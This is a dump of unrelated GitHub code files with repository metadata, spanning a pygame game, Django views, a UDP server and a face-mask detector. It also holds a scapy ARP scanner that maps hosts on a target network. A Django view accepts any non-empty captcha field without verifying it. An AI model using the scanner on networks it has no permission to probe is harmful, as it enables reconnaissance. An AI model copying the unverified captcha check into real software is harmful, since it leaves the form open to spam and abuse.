self.ver = None\r\n self.row_count = 5\r\n\r\n def reset_all_trans(self):\r\n self.user_name = None\r\n self.user_pwd = None\r\n self.host = None\r\n self.port = None\r\n self.sid = None\r\n self.database_address = None\r\n\r\n def get_database_address(self):\r\n self.database_address = str(self.host) + ':' + str(self.port) + '/' + str(self.sid)\r\n return self.database_address","repo_name":"sola1121/the_stock_work","sub_path":"trans.py","file_name":"trans.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39358568528","text":"import os \r\n\r\ndef rename_files():\r\n #1 get files names from folder\r\n file_list=os.listdir(r\"C:\\Users\\manis\\Downloads\\prank\") \r\n print (file_list)\r\n saved_path=os.getcwd()\r\n print(\"current working directory\"+saved_path) \r\n os.chdir(r\"C:\\Users\\manis\\Downloads\\prank\")\r\n #2 for each file rename filename\r\n remove=\"123456789\" \r\n table=str.maketrans(\"\",\"\",remove) \r\n for file_name in file_list: \r\n os.rename(file_name,file_name.translate(table)) \r\n\r\n\r\nrename_files()\r\n","repo_name":"manish4487/Python-Mini-Projects-Udacity-Coursework-","sub_path":"Secret message/rename_files.py","file_name":"rename_files.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34809063166","text":"#!/usr/bin/env python3\nimport scapy.all as scapy\nimport optparse\ndef get_arg():\n parse=optparse.OptionParser()\n parse.add_option(\"-t\",\"--target\", dest=\"target\", help=\"Takes the target IP\")\n return parse.parse_args()\n\ndef scan(ip):\n arp_request = scapy.ARP(pdst=ip)\n broadcast = scapy.Ether(dst=\"ff:ff:ff:ff:ff:ff\")\n arp_request_broadcast = broadcast/arp_request\n answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=0)[0]\n clients_list=[]\n for element in answered_list:\n client_dict={\"ip\":element[1].psrc, \"mac\":element[1].hwsrc}\n clients_list.append(client_dict)\n return clients_list\n\ndef print_result(result_list):\n print(\"IP\\t\\tMAC Address\", end=\"\\n_________________________________________________\\n\")\n for element in result_list:\n print(element[\"ip\"]+\"\\t\"+element[\"mac\"])\noptions = get_arg()[0]\nclient_list = scan(options.target)\nprint_result(client_list)","repo_name":"Anshuman-Raj/Network-Scanner","sub_path":"Network_Scanner.py","file_name":"Network_Scanner.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28683091106","text":"import pygame\r\nimport carMod\r\nimport random\r\n\r\n\r\npygame.init()\r\n\r\nscreenSize = (800, 500)\r\nscreen = pygame.display.set_mode(screenSize)\r\nclock = pygame.time.Clock()\r\nfont = pygame.font.SysFont(None, 24)\r\n\r\ncarImage = pygame.image.load(\"car.png\")\r\ntrackImage = pygame.image.load(\"track.png\")\r\n\r\nplayerCar = carMod.Car(5,pygame.Vector2((100, 100)) ,carImage, (255, 0, 0))\r\n\r\ntrackMask = trackImage.convert()\r\ntrackMask.set_colorkey((255,255,255))\r\nmask = pygame.mask.from_surface(trackMask)\r\n\r\n\r\n\r\nBLACK = (255, 255, 255)\r\nRED = (255, 0, 0)\r\nWHITE = (0, 0, 0)\r\n\r\n\r\nloop = True\r\nwhile loop:\r\n \r\n clock.tick(60)\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n loop = False\r\n \r\n \r\n screen.fill(BLACK)\r\n\r\n keys = pygame.key.get_pressed()\r\n if keys[pygame.K_w]:\r\n playerCar.Drive()\r\n if keys[pygame.K_a]:\r\n playerCar.turn(-5)\r\n if keys[pygame.K_d]:\r\n playerCar.turn(5)\r\n\r\n screen.blit(mask.to_surface(), (0, 0))\r\n playerCar.update(screen)\r\n \r\n if not mask.get_at((playerCar.position.x, playerCar.position.y)):\r\n print(\"you lose\")\r\n loop = False\r\n\r\n pygame.display.flip()","repo_name":"Floatable/Racing-Game","sub_path":"fishles/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6829391224","text":"import socket\n\n# Define the server's IP address and port\nSERVER_HOST = '0.0.0.0' # Listen on all available interfaces\nSERVER_PORT = 12345\n\n# Create a socket for the server\nserver_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nserver_socket.bind((SERVER_HOST, SERVER_PORT))\n\nprint(\"Server is listening on\", SERVER_HOST, \"port\", SERVER_PORT)\n\nwhile True:\n # Receive data from the client\n data, client_address = server_socket.recvfrom(1024)\n print(\"Received from:\", client_address, \"Message:\", data.decode())\n\n # Send a response back to the client\n response = \"Server received your message: \" + data.decode()\n server_socket.sendto(response.encode(), client_address)\n","repo_name":"shaheen-senpai/S7DSLAB","sub_path":"Familarization/serverUDP.py","file_name":"serverUDP.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72862332212","text":"import tkinter as tk\n\n\nclass TrackPointGUI:\n x = 0\n y = 0\n\n is_valid = False\n\n def __init__(self, root):\n self.root = root\n\n self.x = self.root.cache_x\n self.y = self.root.cache_y\n\n self.var_x = tk.IntVar()\n self.var_y = tk.IntVar()\n self.var_x.set(self.x)\n self.var_y.set(self.y)\n\n self.window = tk.Toplevel(master=self.root.window)\n self.window.title(f\"Track\")\n\n self.frm_coord = tk.Frame(master=self.window)\n\n self.lbl_x = tk.Label(master=self.frm_coord, text=\"x: \")\n self.lbl_y = tk.Label(master=self.frm_coord, text=\"y: \")\n self.ent_x = tk.Entry(master=self.frm_coord, textvariable=self.var_x, width=10)\n self.ent_y = tk.Entry(master=self.frm_coord, textvariable=self.var_y, width=10)\n\n self.lbl_x.grid(row=0, column=0, padx=(5, 0), pady=10)\n self.ent_x.grid(row=0, column=1, padx=5, pady=10)\n self.lbl_y.grid(row=0, column=2, padx=(5, 0), pady=10)\n self.ent_y.grid(row=0, column=3, padx=5, pady=10)\n\n self.frm_coord.pack()\n\n self.frm_button = tk.Frame(master=self.window)\n\n self.btn_cancel = tk.Button(master=self.frm_button, text=\"Cancel\", command=self.cancel)\n self.btn_submit = tk.Button(master=self.frm_button, text=\"Submit\", command=self.submit)\n\n self.btn_cancel.pack(side=tk.LEFT, padx=5, pady=(0, 5))\n self.btn_submit.pack(side=tk.RIGHT, padx=5, pady=(0, 5))\n\n self.frm_button.pack()\n\n self.window.resizable(False, False)\n\n def cancel(self):\n self.window.destroy()\n\n def submit(self):\n if self.var_x.get() and self.var_y.get():\n self.is_valid = True\n self.x = self.var_x.get()\n self.y = self.var_y.get()\n else:\n self.is_valid = False\n\n self.window.destroy()\n","repo_name":"yaor42/Fringe-Analyzer","sub_path":"GUIs/TrackPointGUI.py","file_name":"TrackPointGUI.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"7364243920","text":"from django.shortcuts import render\nfrom django.http import Http404, HttpResponse, HttpResponseRedirect\nfrom django.views.generic import DetailView, CreateView,\\\n TemplateView, UpdateView,\\\n ListView, RedirectView\nfrom django.core.mail import send_mail\nfrom templated_email import send_templated_mail\nfrom django.contrib import messages\nfrom .models import Candidate, CandidateInvite, College, CandidateUpdate\nfrom political_sisterhood.issue.models import CandidateIssue\nfrom haystack.generic_views import SearchView as BaseFacetedSearchView\nfrom political_sisterhood.races.models import State, Race\nimport logging\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.urls import reverse\nfrom .forms import CandidateForm\nfrom political_sisterhood.search.forms import SearchForm\nfrom haystack.query import SearchQuerySet, EmptySearchQuerySet, SQ\nfrom haystack.inputs import AutoQuery\nimport urllib.parse as urlparse\nlogger = logging.getLogger(__name__)\n# Create your views here.\n\n\ndef sendingEmail(candidate, new_data):\n candidate = Candidate.objects.get(id=candidate)\n from django.core import serializers\n try:\n send_templated_mail(\n template_name='updated',\n from_email=\"Political Sisterhood \",\n recipient_list=['chris@politicalsisterhood.com',\n 'susan@politicalsisterhood.com'],\n context={\n 'name': candidate.full_name,\n 'url': candidate.get_absolute_url(),\n 'candidate': candidate,\n 'instance': new_data\n }\n )\n except Exception as e:\n logger.error(e)\n\n\nclass AllCandidates(BaseFacetedSearchView):\n template_name = \"candidate/all.html\"\n facet_fields= ['party']\n form_class = SearchForm\n paginate_by = 12\n paginate_orphans = 2\n\n # All CHANGES NEED TO BE DONE IN SEARCH/VIEWS AND CANDIDATE/VIEWS\n def get_queryset(self):\n queryset = SearchQuerySet().filter(active=True).order_by('first_name')\n # further filter queryset based on some set of criteria\n party = self.request.GET.getlist('party', '')\n party_or = \"\"\n college = self.request.GET.getlist('college', '')\n college_or = \"\"\n state = self.request.GET.getlist('state', '')\n state_or = \"\"\n issues = self.request.GET.getlist('issues', '')\n issues_or = \"\"\n race = self.request.GET.getlist('race', '')\n race_or = \"\"\n race_type = self.request.GET.getlist('race_type', '')\n race_type_or = \"\"\n women = self.request.GET.get('women', '')\n q = self.request.GET.get('q', '')\n page = self.request.GET.get('page', '')\n search = ''.join(party) + q + page\n if search == \"\":\n search = \"null\"\n if party:\n for facet in party:\n party_or += 'party: \"%s\"' % (facet)\n queryset = queryset.narrow(party_or)\n if college:\n for facet in college:\n college_or += 'college: \"%s\"' % (facet)\n queryset = queryset.narrow(college_or)\n if state:\n for facet in state:\n state_or += 'state: \"%s\"' % (facet)\n queryset = queryset.narrow(state_or)\n if issues:\n for facet in issues:\n issues_or += 'issues: \"%s\"' % (facet)\n queryset = queryset.narrow(issues_or)\n if race:\n for facet in race:\n race_or += 'race: \"%s\"' % (facet)\n queryset = queryset.narrow(race_or)\n if race_type:\n for facet in race_type:\n race_type_or += 'race_type: \"%s\"' % (facet)\n queryset = queryset.narrow(race_type_or)\n if q:\n queryset = queryset.filter(SQ(text=AutoQuery(q))|SQ(title=AutoQuery(q)))\n if women:\n queryset = queryset.filter(women=True)\n return queryset\n\n def form_valid(self, form):\n context = self.get_context_data(**{\n self.form_name: form,\n 'object_list': self.get_queryset()\n })\n return self.render_to_response(context)\n\n def form_invalid(self, form):\n context = self.get_context_data(**{\n self.form_name: form,\n 'object_list': self.get_queryset()\n })\n return self.render_to_response(context)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['query'] = self.request.GET.get('q','')\n context['party'] = self.request.GET.getlist('party', '')\n context['college'] = self.request.GET.getlist('college', '')\n context['state'] = self.request.GET.getlist('state', '')\n context['issues'] = self.request.GET.getlist('issues', '')\n women = self.request.GET.get('women', '')\n if women == True or women == 'on':\n context['women'] = True\n context['race_type'] = self.request.GET.getlist('race_type', '')\n return context\n\n\nclass CandidateView(DetailView):\n model = Candidate\n template_name = \"candidate/detail.html\"\n\n def dispatch(self, *args, **kwargs):\n user = self.request.user.is_authenticated\n if 'visited' in self.request.session:\n visits = self.request.session['visited']\n else:\n visits = None\n if not user:\n if visits and len(visits) > 3:\n return redirect(reverse('candidate:paywall'))\n visited = []\n candidate = self.get_object().id\n if visits:\n visited.extend(visits)\n if not candidate in visits:\n visited.append(candidate)\n else:\n visited.append(candidate)\n self.request.session['visited'] = visited\n return super().dispatch(*args, **kwargs)\n\n def get_object(self):\n slug = self.kwargs['slug']\n candidate = Candidate.objects.get(slug=slug)\n return candidate\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['approved'] = False\n if self.request.GET.get('approved') == 'pending':\n context['approved'] = True\n elif self.get_object().approved:\n context['approved'] = True\n return context\n\n\nclass StateListView(ListView):\n model = Candidate\n template_name = \"state/list.html\"\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n state =State.objects.get(state=self.kwargs['state'].upper())\n data['object'] = state\n return data\n\n def get_queryset(self):\n state = Candidate.objects.filter(state=self.kwargs['state'])\n return state\n\n\nclass UpdateCandidateInvite(UpdateView):\n # specify a custom ModelForm\n form_class = CandidateForm\n template_name = \"candidate/update.html\"\n\n def get_object(self, queryset=None):\n # get the existing object or created a new one\n candidate = get_object_or_404(CandidateInvite, md5_email=self.kwargs['hash'])\n if candidate.candidate:\n obj = Candidate.objects.get(id=candidate.candidate.id)\n CandidateInvite.objects.filter(md5_email=self.kwargs['hash']).update(candidate=obj)\n else:\n obj = None\n return obj\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n data['contact'] = CandidateInvite.objects.get(md5_email=self.kwargs['hash'])\n return data\n\n def form_valid(self, form):\n instance = form.save(commit=False)\n try:\n sendingEmail(instance.id, instance)\n except Exception as e:\n logger.error(e)\n instance.save()\n try:\n CandidateInvite.objects.filter(md5_email=self.kwargs['hash']).update(used=True)\n issue1, create = CandidateIssue.objects.get_or_create(candidate=instance,\n issue=form.cleaned_data.get('issue1'),\n desc=form.cleaned_data.get('issue1_detail'))\n issue2, created = CandidateIssue.objects.get_or_create(candidate=instance,\n issue=form.cleaned_data.get('issue2'),\n desc=form.cleaned_data.get('issue2_detail'))\n issue3, created = CandidateIssue.objects.get_or_create(candidate=instance,\n issue=form.cleaned_data.get('issue3'),\n desc=form.cleaned_data.get('issue3_detail'))\n college, create = College.objects.get_or_create(name=form.cleaned_data['college_free'])\n Candidate.objects.filter(id=instance.id).update(issue1=issue1.issue_num,\n issue2=issue2.issue_num,\n issue3=issue3.issue_num,\n race_name=form.cleaned_data.get('race_name'),\n college=college, approval=\"Pending\")\n try:\n CandidateUpdate.objects.create(email=form.cleaned_data.get('update_email'),\n first_name=form.cleaned_data.get('update_first_name'),\n last_name=form.cleaned_data.get('update_last_name'),\n note=form.cleaned_data.get('update_note', ''),\n candidate=instance)\n except Exception as e:\n logger.error(e)\n except Exception as e:\n logger.error(e)\n\n return redirect(Candidate.objects.get(id=instance.id).get_absolute_url() + \"?approved=pending\")\n\n\nclass CreateCandidate(CreateView):\n form_class = CandidateForm\n template_name = \"candidate/create.html\"\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n data['referral'] = self.request.GET.get('ref', '')\n return data\n\n def form_valid(self, form):\n instance = form.save(commit=True)\n try:\n ref = self.request.GET.get('ref', '')\n issue1, create = CandidateIssue.objects.get_or_create(candidate=instance,\n issue=form.cleaned_data.get('issue1'),\n desc=form.cleaned_data.get('issue1_detail'))\n issue2, created = CandidateIssue.objects.get_or_create(candidate=instance,\n issue=form.cleaned_data.get('issue2'),\n desc=form.cleaned_data.get('issue2_detail'))\n issue3, created = CandidateIssue.objects.get_or_create(candidate=instance,\n issue=form.cleaned_data.get('issue3'),\n desc=form.cleaned_data.get('issue3_detail'))\n college, create = College.objects.get_or_create(name=form.cleaned_data['college_free'])\n Candidate.objects.filter(id=instance.id).update(issue1=issue1.issue_num,\n issue2=issue2.issue_num,\n issue3=issue3.issue_num,\n college=college,\n approval=\"Pending\",\n race_name=form.cleaned_data.get('race_name'),\n referral=ref)\n try:\n CandidateUpdate.objects.create(email=form.cleaned_data.get('update_email'),\n first_name=form.cleaned_data.get('update_first_name'),\n last_name=form.cleaned_data.get('update_last_name'),\n note=form.cleaned_data.get('update_note', ''),\n candidate=instance)\n except Exception as e:\n logger.warning(e)\n except Exception as e:\n logger.error(e)\n\n try:\n sendingEmail(instance.id)\n\n except Exception as e:\n logger.error(e)\n\n return redirect(Candidate.objects.get(id=instance.id).get_absolute_url() + \"?approved=pending\")\n\n\nclass CandidatePricing(TemplateView):\n template_name = \"candidate/pricing.html\"\n\n\nclass CandidatePaywall(TemplateView):\n template_name = \"candidate/paywall.html\"\n\n\ndef CandidateIssueReport(request):\n name = request.POST.get('name', '')\n email = request.POST.get('email', '')\n other = request.POST.get('other', '')\n issue = request.POST.get('issue', '')\n candidate = request.POST.get('candidate', '')\n return_slug = request.POST.get('return', '')\n captcha = request.POST.get('g-recaptcha', '')\n if captcha:\n subject = '[CANDIDATE ISSUE] Issue on {}'.format(candidate)\n body = 'NAME: %s\\n\\nEMAIL: %s\\n\\nISSUE: %s\\n\\nMESSAGE: %s' % (name, email, issue, other)\n from_email = 'info@politicalsisterhood.com'\n recipients = [\n 'chris@politicalsisterhood.com',\n 'susan@politicalsisterhood.com',\n ]\n send_mail(subject, body, from_email, recipients)\n messages.success(request, 'We appreciate your feedback!')\n return HttpResponseRedirect(return_slug)\n else:\n messages.warning(request, 'Please fill out captcha')\n return HttpResponseRedirect(return_slug)","repo_name":"2019politicalsisterhood/2019Candidates","sub_path":"political_sisterhood/candidate/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14132,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35865307630","text":"import json\n\n\nclass Iterator_coutry:\n\n def __init__(self, path):\n self.start = -1\n self.path = path\n with open('countries.json', encoding='utf8') as file:\n self.data = json.load(file)\n self.file = open(path, 'w', encoding='utf8')\n\n def __iter__(self):\n return self\n\n def __next__(self):\n self.start += 1\n if self.start >= len(self.data):\n self.file.close()\n raise StopIteration\n country_name = self.data[self.start]['name']['official']\n pair = country_name + ' - ' + 'https://en.wikipedia.org/wiki/' + country_name.replace(' ', '_')\n to_write = str(pair)\n self.file.write(f'{to_write}\\n')\n\n\nif __name__ == '__main__':\n country_list = Iterator_coutry('pair.txt')\n for item in country_list:\n next(country_list)\n","repo_name":"shattl2000/Netology","sub_path":"Python_course/Part 2/Lesson 2/Iterator_country.py","file_name":"Iterator_country.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"12155612655","text":"# Write your code here\nfilename: str = 'flowers.txt'\n\n# HINT: create a dictionary from flowers.txt\nflower_dict = {}\nwith open(filename, 'r') as f:\n while True:\n line = f.readline()\n if not line:\n break\n parts = [x.strip() for x in str.split(line, ':')]\n flower_dict[parts[0].upper()] = parts[1]\n\n# HINT: create a function to ask for user's first and last name\ndef get_name():\n full_name = input(\"Enter your First [space] Last name only: \")\n return full_name\n\n# print the desired output\nname: str = get_name()\nprint(f'Unique flower name with the first letter: {flower_dict[name[0].upper()]}')\n\n","repo_name":"surishashank/learning","sub_path":"ai_programming_with_python/05_practice.py","file_name":"05_practice.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27041771555","text":"import cv2\nimport numpy as np\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.preprocessing.image import img_to_array\nfrom tensorflow.keras.applications.mobilenet_v2 import preprocess_input\nimport os\n\ndef detect_face(frame, faceNet):\n\t(h, w) = frame.shape[:2]\n\tblob = cv2.dnn.blobFromImage(frame, 1.0, (224, 224), (110, 170, 120))\n\t\n\t# set the input to the pre-trained deep learning network and obtain\n\t# the output predicted probabilities for each of the classes.\n\tfaceNet.setInput(blob)\n\tdetections = faceNet.forward()\n\n\tfaces = []\n\tlocs = []\n\n\t# Looping over all the face detected.\n\tfor i in range(0, detections.shape[2]):\n\t\t# confidence associated with the detection\n\t\tconfidence = detections[0, 0, i, 2]\n\n\t\tif(confidence > 0.5):\n\t\t\t# Bounding box for the face\n\t\t\tbox = detections[0, 0, i, 3:7] * np.array([w, h, w, h])\n\t\t\t(startX, startY, endX, endY) = box.astype(\"int\")\n\n\t\t\t# To ensure that the bounding box is within the dimensions \n\t\t\t# of the frame.\n\t\t\t(startX, startY) = (max(0, startX), max(0, startY))\n\t\t\t(endX, endY) = (min(w - 1, endX), min(h - 1, endY))\n\t\t\t\n\t\t\t# ROI\n\t\t\tface = frame[startY:endY, startX:endX]\n\t\t\tcv2.imshow(\"Face\", face)\n\t\t\tif(len(face)>0):\n\t\t\t\t# Since, cv2 reads the frame in BGR format, coverting\n\t\t\t\t# it into RGB\n\t\t\t\tface = cv2.cvtColor(face, cv2.COLOR_BGR2RGB)\n\t\t\t\tface = cv2.resize(face, (224, 224))\n\t\t\t\tface = img_to_array(face)\n\t\t\t\tface = preprocess_input(face)\n\t\t\t\t# Appending the face abd bbox in to their respective lists.\n\t\t\t\tfaces.append(face)\n\t\t\t\tlocs.append((startX, startY, endX, endY))\n\n\treturn (locs, faces)\n\ndef predict(faces, maskNet):\n\tpreds = []\n\tif(len(faces) > 0):\n\t\t# Making predictions in batches for faster inference\n\t\tfaces = np.array(faces, dtype=\"float32\")\n\t\tpreds = maskNet.predict(faces, batch_size=16)\n\n\treturn preds\n\nif __name__==\"__main__\":\n\t# Loading face detection model.\n\tprint(\"[INFO] Loading face detector model...\")\n\t# prototxtPath = r\"face_detector\\deploy.prototxt\"\n\tprototxtPath = os.path.join(\"face_detector\", \"deploy.prototxt\")\n\t# weightsPath = r\"face_detector\\res10_300x300_ssd_iter_140000.caffemodel\"\n\tweightsPath = os.path.join(\"face_detector\", \"res10_300x300_ssd_iter_140000.caffemodel\")\n\tfaceNet = cv2.dnn.readNet(prototxtPath, weightsPath)\n\n\t# Loading the face mask trained model.\n\tprint(\"[INFO] Loading face mask detector model...\")\n\tmaskNet = load_model(\"mask_detector.model\")\n\n\t# Starting videostream\n\tprint(\"[INFO] Starting video stream...\")\n\tcap = cv2.VideoCapture(0)\n\n\twhile(1):\n\t\tret, frame = cap.read()\n\t\t(locs, faces) = detect_face(frame, faceNet)\n\t\tpreds = predict(faces, maskNet)\n\n\t\t# Loop over the detected faces and their corresponding locations\n\t\tfor (box, pred) in zip(locs, preds):\n\t\t\t(startX, startY, endX, endY) = box\n\t\t\t(mask, withoutMask) = pred\n\n\t\t\t# Determine the resultant class and display its probability\n\t\t\tif(mask > withoutMask):\n\t\t\t\tlabel = \"{}: {:.2f}%\".format(\"Mask\", max(mask, withoutMask) * 100)\n\t\t\t\tcolor = (0, 255, 0)\n\t\t\telse:\n\t\t\t\tlabel = \"{}: {:.2f}%\".format(\"No Mask\", max(mask, withoutMask) * 100)\n\t\t\t\tcolor = (0, 0, 255)\n\t\n\t\t\t# display the label and bounding box rectangle on the output\n\t\t\t# frame\n\t\t\tcv2.putText(frame, label, (startX, startY - 10),\n\t\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)\n\t\t\tcv2.rectangle(frame, (startX, startY), (endX, endY), color, 2)\n\n\t\t# Total number of faces detected in the frame.\n\t\tcv2.putText(frame, \"Total no. of face detected: {0}\".format(len(locs)), \n\t\t\t(20, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,255,255), 2)\t\n\n\t\t# Output Frame\n\t\tcv2.imshow(\"Frame\", frame)\n\t\tif(cv2.waitKey(1) & 0xFF == ord('q')):\n\t\t\tbreak\n\n\tcv2.destroyAllWindows()","repo_name":"sayantann11/face-mask-dectection","sub_path":"detect_face.py","file_name":"detect_face.py","file_ext":"py","file_size_in_byte":3612,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2818426377","text":"num_shops = int(input())\nshop_costs = sorted(map(int, input().split()))\nnum_days = int(input())\n\nsol = list()\n\nfor d in range(num_days):\n today_money = int(input())\n lo = -1\n hi = len(shop_costs)\n while lo + 1 < hi:\n mid = int((lo + hi) / 2)\n if shop_costs[mid] <= today_money: lo = mid\n else: hi = mid\n sol += f\"{lo + 1}\"\n sol += \"\\n\"\nprint(\"\".join(sol[:-1]))\n","repo_name":"akashkw/practice","sub_path":"python/codeforces/interesting_drink/interesting_drink.py","file_name":"interesting_drink.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35865178510","text":"import json\nfrom pprint import pprint\n\n\ndef count_10_word_in_json():\n from collections import Counter\n with open(\"newsafr.json\", encoding=\"utf-8\") as datafile:\n json_data = json.load(datafile)\n json_items = json_data[\"rss\"][\"channel\"][\"items\"]\n\n descriptions = []\n\n for i in json_items:\n descriptions.append(i[\"description\"].split())\n\n format_description = []\n\n for elem in sum(descriptions, []):\n if len(elem) > 6:\n format_description.append(elem.lower())\n\n def sortByLength(inputStr):\n return len(inputStr)\n\n format_description.sort(key=sortByLength, reverse=True)\n\n Counter = Counter(format_description)\n words = Counter.most_common(10)\n for word in words:\n pprint(f\"Слово: '{word[0]}' встречается: {word[1]} раз\")\n\n\ncount_10_word_in_json()\n","repo_name":"shattl2000/Netology","sub_path":"Python_course/Part 1/Lesson 10/news_json.py","file_name":"news_json.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"15074303007","text":"from turtle import Turtle\nimport random\n\n\nclass Wall(Turtle):\n\n def __init__(self):\n super().__init__()\n self.color(\"orange\")\n self.shape(\"square\")\n self.shapesize(stretch_wid=1, stretch_len=5)\n self.penup()\n","repo_name":"yangpu2007360/breakout_game","sub_path":"wall.py","file_name":"wall.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74180066931","text":"import math\nimport matplotlib.pyplot as plt\n\n# e stands for epsilon = COR\n## --- LSD Analytical Solution for gamma() -------------------------------------\n\ndef RootByBisection(a, b, tol, maxiter, coefficient_of_restitution):\n\n if coefficient_of_restitution < 0.001 :\n coefficient_of_restitution = 0.001\n\n if coefficient_of_restitution > 0.999 :\n return 0.0\n k=0\n gamma = 0.5 * (a + b)\n\n while b - a > tol and k <= maxiter:\n coefficient_of_restitution_trial = coeff_of_rest_diff(gamma, coefficient_of_restitution)\n\n if coeff_of_rest_diff(a, coefficient_of_restitution) * coefficient_of_restitution_trial < 0:\n b = gamma\n\n elif coefficient_of_restitution_trial == 0:\n return gamma\n\n else:\n a = gamma\n\n gamma = 0.5 * (a + b)\n k += 1\n\n return gamma\n\n# function below from Thornton\n\ndef coeff_of_rest_diff(gamma, desired_coefficient_of_restit):\n\n if gamma <= 1.0/math.sqrt(2.0) :\n return math.exp(-gamma/math.sqrt(1.0-gamma*gamma)*(math.pi-math.atan(2.0*gamma*math.sqrt(1.0-gamma*gamma)/(-2.0*gamma*gamma+1.0))))-desired_coefficient_of_restit\n elif gamma < 1.0 :\n return math.exp(-gamma/math.sqrt(1.0-gamma*gamma)*math.atan(2.0*gamma*math.sqrt(1.0-gamma*gamma)/(2.0*gamma*gamma-1.0)))-desired_coefficient_of_restit\n elif gamma == 1.0 :\n return 0.135335283 - desired_coefficient_of_restit\n else:\n return math.exp(-gamma/math.sqrt(gamma*gamma-1.0)*math.log((gamma/math.sqrt(gamma*gamma-1.0)+1.0)/(gamma/math.sqrt(gamma*gamma-1.0)-1.0)))-desired_coefficient_of_restit\n\n## --------------------------------------------------------------------------------\n\n\n## ------------- HMD fitting curves by Thornton -----------------------------------\ndef GammaForHertzThornton(e):\n if e < 0.001:\n e = 0.001\n\n if e > 0.999:\n return 0.0\n\n h1 = -6.918798\n h2 = -16.41105\n h3 = 146.8049\n h4 = -796.4559\n h5 = 2928.711\n h6 = -7206.864\n h7 = 11494.29\n h8 = -11342.18\n h9 = 6276.757\n h10 = -1489.915\n\n alpha = e * (h1 + e * (h2 + e * (h3 + e * (h4 + e * (h5 + e * (h6 + e * (h7 + e *(h8 + e * (h9 + e * h10)))))))))\n\n return math.sqrt(1.0/(1.0 - (1.0+e)*(1.0+e) * math.exp(alpha)) - 1.0)\n## --------------------------------------------------------------------------------\n\n\n## ------------- LSD fitting curves by Thornton -----------------------------------\ndef GammaForLSDbyThorntonFittings(e):\n\n if e < 0.001:\n e = 0.001\n\n if e > 0.999:\n return 0.0\n\n h_1 = 0.2446517\n h_2 = -0.5433478\n h_3 = 0.9280126\n h_4 = -1.5897793\n h_5 = 1.2102729\n h_6 = 3.3815393\n h_7 = 6.3814014\n h_8 = -34.482428\n h_9 = 25.672467\n h_10 = 94.396267\n\n beta = e - 0.5\n\n xi = (h_1 + beta * (h_2 + beta * (h_3 + beta * (h_4 + beta * (h_5 + beta * (\n h_6 + beta * (h_7 + beta * (h_8 + beta * (h_9 + beta * (beta * h_10))))))))))\n\n\n zeta = e * (1 - e)**2 * xi\n\n return zeta\n\n'''\ncor = [i/100 for i in range(1,100)]\ngamma_hmd_fitted = [GammaForHertzThornton(i) for i in cor]\ngamma_lsd_analytical = [RootByBisection(0.0, 16.0, 0.0001, 300, i) for i in cor]\ngamma_lsd_fitted = [GammaForLSDbyThorntonFittings(i) for i in cor]\n\norange = (227 / 255, 114 / 255, 34 / 255)\n#plt.plot(cor, gamma_lsd_analytical, color=(0 / 255, 101 / 255, 189 / 255), label=\"Zeta Analytical\")\n\nplt.plot(cor, gamma_hmd_fitted, color=orange, label=\"Zeta Fitted for HMD\")\n#plt.plot(cor, gamma_lsd_analytical, color=(0 / 255, 101 / 255, 189 / 255), label=\"Zeta Analytical LSD\")\nplt.legend()\n#plt.grid()\nplt.ylabel('Dashpot Coefficient $\\zeta$ [-]')\nplt.xlabel('Coefficient of Restitution $\\epsilon$ [-]')\nplt.savefig('C:/Users/Jaist/Desktop/plots/' + 'zeta_cor_hmd_lsd' + '.pdf')\nplt.show()\n\n\nlabel=\"Zeta Fitted by Thornton \"\n'''","repo_name":"benediktjaist/BA_DEM","sub_path":"GUI/test_cor.py","file_name":"test_cor.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20759219887","text":"import requests\nimport ast\nimport json\nfrom config import wechat_conf\nimport simplejson\nclass WeChat(object):\n\n def __init__(self):\n self.corpid = wechat_conf[\"corpid\"]\n self.corpsecret = wechat_conf[\"corpsecret\"]\n self.party = wechat_conf[\"party\"]\n self.agentid = wechat_conf[\"agentid\"]\n 